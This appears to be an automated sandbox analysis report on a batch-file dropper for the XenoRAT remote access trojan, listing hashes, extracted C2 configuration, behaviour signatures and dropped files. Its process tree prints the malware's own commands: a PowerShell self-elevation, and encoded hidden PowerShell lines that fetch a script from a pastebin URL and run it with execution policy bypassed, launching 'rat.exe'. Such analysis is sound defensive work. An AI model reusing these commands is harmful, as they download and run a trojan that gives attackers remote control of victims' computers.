Overview

overview

10

Static

static

1

virus_src.bat

windows7-x64

8

virus_src.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 20:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    virus_src.bat

  • Size

    652B

  • MD5

    3d20c8ba40ea3e85334342e7c01018bd

  • SHA1

    b678d69ec173ca2e385ba8a8bda18be618f5af2c

  • SHA256

    4a4f56be826841723b685fe98aedfb81eb3c11dfac2f4a466f4c78eef2c5bb71

  • SHA512

    0fdeac77b6c4f3ba7ee53c33785c6c576873a7798d8921721d21498910316893b8ebb0e499759bd1d62239506499ce4bf9f222a2019c4a882ffd1a2ce86a6776

Score
10/10
xenoratdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xenorat

C2

127.0.0.1

Mutex

09fasifjkansmf8s9ghjndui90gijmfgpjkjyt90y843

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    4444

  • startup_name

    nothingset

Signatures

  • Detect XenoRat Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Xenorat family
    xenorat
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3976
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQgBoAFcAdgBTAFAAcQBxACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgB0AGUAbQBwAFwAUwB5AHMAdABlAG0AUwB0AGEAcgB0AHUAcAAuAHAAcwAxAA==
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoAdABlAG0AcABcAFMAeQBzAHQAZQBtAFMAdABhAHIAdAB1AHAALgBwAHMAMQA=
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\SystemStartup.ps1
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2820
            • C:\Users\Admin\AppData\Local\Temp\rat.exe
              "C:\Users\Admin\AppData\Local\Temp\rat.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4136

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    2cd928baba5af07197e8ab4c3309ff7c

    SHA1

    f282ff7f9323a5f5eab5479fd7c7e25776deac75

    SHA256

    52638798f1f802fe7015092932c729461f2ba72fa3c906b443f7cedcc99f88c5

    SHA512

    bea23897dd1f0a5aeb44f1197128e87bf1da2e5dad2d281425ed9b6bee0dd5e3b1898fe2e4eef659ed5a6bb13014ed57d3fd914e5b1247247d7fe2684fca69ef

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\SystemStartup.ps1
    Filesize

    444B

    MD5

    36283fdf74e6a121263391fc05cbdb16

    SHA1

    214b06862abbeeb40e71b2b244b2018453c1282a

    SHA256

    d7720dc0062268305fd1ad4751f58ee4aceab50c2923f19ebde5e426a9e0dc5a

    SHA512

    15ef36edcc2bb6b6fc192aee0647146c65ec771168952aa7e3a5fd7024ab01ee7348b2fe3ce03d5c6e1e8e1d15ddcd0e4671f5f5734f48d5c3d200931db5725f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0jon44s.hsn.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\rat.exe
    Filesize

    45KB

    MD5

    77020688c984e8b2675f7d0d33f02b3e

    SHA1

    6d67ebf519424f1f1ace23b6ce2c56aa5c7449b8

    SHA256

    c9ec55f100a9b7cb76f0ee6d2ba97edab4f133ca3a2351e96162159446c986ec

    SHA512

    c60ade9f5fdc3c0590c4fd2995a61b81e333e4afb329d9a10833e1bd7f9b444eaea6bb23d0dd2d85c6163a71166bba06c0603f2e9a5c0e4d83474b25c72d4004

    Download Submit

  • memory/2820-67-0x000002C3E24F0000-0x000002C3E2566000-memory.dmp

    Filesize

    472KB

    Download

  • memory/2820-54-0x000002C3E22D0000-0x000002C3E2314000-memory.dmp

    Filesize

    272KB

    Download

  • memory/3136-34-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3136-17-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3136-29-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3136-30-0x000002C19C900000-0x000002C19D0A6000-memory.dmp

    Filesize

    7.6MB

    Download

  • memory/3136-18-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3976-0-0x00007FFBC4243000-0x00007FFBC4245000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3976-15-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3976-12-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3976-11-0x00007FFBC4240000-0x00007FFBC4D01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3976-1-0x00000229FBB10000-0x00000229FBB32000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4136-68-0x0000000000700000-0x0000000000712000-memory.dmp

    Filesize

    72KB

    Download